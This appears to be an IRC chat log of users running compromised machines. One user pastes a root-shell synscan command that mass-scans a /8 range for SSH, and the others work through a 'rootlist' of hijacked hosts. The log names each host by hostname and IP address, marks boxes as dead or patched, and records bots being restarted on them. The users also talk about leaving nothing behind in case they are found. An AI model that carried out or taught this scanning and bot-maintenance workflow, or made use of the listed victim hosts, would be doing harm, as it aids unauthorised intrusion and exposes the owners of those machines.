rezzie!loud@63.145.151.251 :id rather not define anything at all
no1here!~no1here@152.94.16.11 :yea..:rezzie!loud@63.145.151.251 :in the event that info gets found
no1here!~no1here@152.94.16.11 :don;t put anything
rezzie!loud@63.145.151.251 :okay
rezzie!loud@63.145.151.251 :and what utils should automaticly be installed
rezzie!loud@63.145.151.251 :wget
rezzie!loud@63.145.151.251 :obviously
rezzie!loud@63.145.151.251 :hah
rezzie!loud@63.145.151.251 :i wonder
r0nn13!~Stargazer@152.94.16.11 :i wooo ooo ooo n der
no1here!~no1here@152.94.16.11 :bbl
rezzie!loud@63.145.151.251 :cya
rezzie!loud@63.145.151.251 :[root@ns1 synscan]# ./synscan iplist out44 eth0 100 22 -u
rezzie!loud@63.145.151.251 :okie
rezzie!loud@63.145.151.251 :scan started on 200.*
rezzie!loud@63.145.151.251 :looks like a very active range
r0nn13!~Stargazer@152.94.16.11 :greatr
rezzie!loud@63.145.151.251 :is that .nl box back up yet?
rezzie!loud@63.145.151.251 :that was a far better scanning box
r0nn13!~Stargazer@152.94.16.11 :the www one ?
r0nn13!~Stargazer@152.94.16.11 :or im confused ?
rezzie!loud@63.145.151.251 :this is gonna be a long list
rezzie!loud@63.145.151.251 :;)
rezzie!loud@63.145.151.251 :i think most are up, simply cant get on irc
r0nn13!~Stargazer@152.94.16.11 :shouldn't kill the ones that don't connect anymore, mtrez ?
r0nn13!~Stargazer@152.94.16.11 :the entries, i mean
rezzie!loud@63.145.151.251 :not sure
rezzie!loud@63.145.151.251 :hehe
r0nn13!~Stargazer@152.94.16.11 :1) rdu57-250-138.nc.rr.com 66.57.250.138 ---> no connection
rezzie!loud@63.145.151.251 :is dead?
r0nn13!~Stargazer@152.94.16.11 :2) cecilia.thn.htu.se 193.10.236.150 --> no connection
r0nn13!~Stargazer@152.94.16.11 :yes
rezzie!loud@63.145.151.251 :well
rezzie!loud@63.145.151.251 :it is cable after all
rezzie!loud@63.145.151.251 :probably not 24/7
rezzie!loud@63.145.151.251 :ehhe
rezzie!loud@63.145.151.251 :ill go through the entire rootlist in a little bit
rezzie!loud@63.145.151.251 :and start making note of those who dont respond
rezzie!loud@63.145.151.251 :to try again tommorow
rezzie!loud@63.145.151.251 :if they dont respond a few days in a row
rezzie!loud@63.145.151.251 :ill note em as dead n gone
r0nn13!~Stargazer@152.94.16.11 :3) s1.andronet.nu 213.80.36.30 --> up, bot running, bot not on irc
r0nn13!~Stargazer@152.94.16.11 :maybe the bot crashed ? should i try to restart it ?
rezzie!loud@63.145.151.251 :yah, thats possible
rezzie!loud@63.145.151.251 :go ahead
r0nn13!~Stargazer@152.94.16.11 :done
r0nn13!~Stargazer@152.94.16.11 :4) dsl-kl-207-34-65-70-cgy.nucleus.com 207.34.65.70
---> been secured, and skey/bsdauth removed
rezzie!loud@63.145.151.251 :hrm
rezzie!loud@63.145.151.251 :damn
rezzie!loud@63.145.151.251 :hehe
r0nn13!~Stargazer@152.94.16.11 :5) adsl-66-72-117-48.dsl.chcgil.ameritech.net 66.72.117.48 ---> dead
rezzie!loud@63.145.151.251 :k, writing this down
r0nn13!~Stargazer@152.94.16.11 :6) 006-12-189-66.wo.cpe.charter-ne.com 66.189.12.6
--> up, bot running, but not on irc
rezzie!loud@63.145.151.251 :k
r0nn13!~Stargazer@152.94.16.11 :well, ill list only the ones dead
rezzie!loud@63.145.151.251 :yep
rezzie!loud@63.145.151.251 :also if theyre patched
rezzie!loud@63.145.151.251 :so i can tag them as patched
r0nn13!~Stargazer@152.94.16.11 :9) evrtwa1-ar3-131-130.biz.dsl.gtei.net 4.40.131.130
---> this box is fucked, libs are gone, ps and ls doesn't work
rezzie!loud@63.145.151.251 :ahh yeh
rezzie!loud@63.145.151.251 :ehheh
rezzie!loud@63.145.151.251 :i remember that one
r0nn13!~Stargazer@152.94.16.11 :i just restarted magellan
r0nn13!~Stargazer@152.94.16.11 :looked crashed
r0nn13!~Stargazer@152.94.16.11 :btw, the BBB boxes, are dynamic ip's
r0nn13!~Stargazer@152.94.16.11 :so the ones are down, are prolly coz they rebooted
r0nn13!~Stargazer@152.94.16.11 :and ip changed
rezzie!loud@63.145.151.251 :hrm
rezzie!loud@63.145.151.251 :bbb is dynamic?
rezzie!loud@63.145.151.251 :i thought bbb was static
r0nn13!~Stargazer@152.94.16.11 :13) evrtwa1-ar3-131-130.biz.dsl.gtei.net 4.40.131.133 --> dead
r0nn13!~Stargazer@152.94.16.11 :no, is not
r0nn13!~Stargazer@152.94.16.11 :just lagged
r0nn13!~Stargazer@152.94.16.11 :lol
r0nn13!~Stargazer@152.94.16.11 :is the one with the stuff fucked
rezzie!loud@63.145.151.251 :how do bbb sites last then?
r0nn13!~Stargazer@152.94.16.11 :16) 193.136.100.73 193.136.100.73 ---> dead
r0nn13!~Stargazer@152.94.16.11 :18) adsl-66-72-96-9.dsl.chcgil.ameritech.net 66.72.96.9 --> connection refused
rezzie!loud@63.145.151.251 :hrm
rezzie!loud@63.145.151.251 :that ip wasnt even in my list
rezzie!loud@63.145.151.251 :66.75.96.192
rezzie!loud@63.145.151.251 :closest i have to that
r0nn13!~Stargazer@152.94.16.11 :23) ts46-03-qdr1258.porch.wa.charter.com 66.190.234.234 --> DEAD
r0nn13!~Stargazer@152.94.16.11 :25) evrtwa1-ar15-4-65-229-161.evrtwa1.dsl-verizon.net 4.65.229.161 --> DEAD
r0nn13!~Stargazer@152.94.16.11 :restarting the bots that are gone seems to work pretty well
rezzie!loud@63.145.151.251 :ehhe yeh
r0nn13!~Stargazer@152.94.16.11 :ns1.proserver looks fucked up
rezzie!loud@63.145.151.251 :im scanning from it
rezzie!loud@63.145.151.251 :might be lagged
rezzie!loud@63.145.151.251 :woops
rezzie!loud@63.145.151.251 :heh
rezzie!loud@63.145.151.251 :nvm
r0nn13!~Stargazer@152.94.16.11 :that or k1m getting packeted again
r0nn13!~Stargazer@152.94.16.11 :[root@ns1 x]# Connection disappeared, errno=0
r0nn13!~Stargazer@152.94.16.11 :seems ok now
r0nn13!~Stargazer@152.94.16.11 :36) 4.46.105.70 lsanca1-ar16-4-46-105-070.lsanca1.dsl-verizon.net ---> DEAD
r0nn13!~Stargazer@152.94.16.11 :38) 193.15.114.54 193.15.114.54 ---> DEAD
r0nn13!~Stargazer@152.94.16.11 :proserveur.com went to hell again eh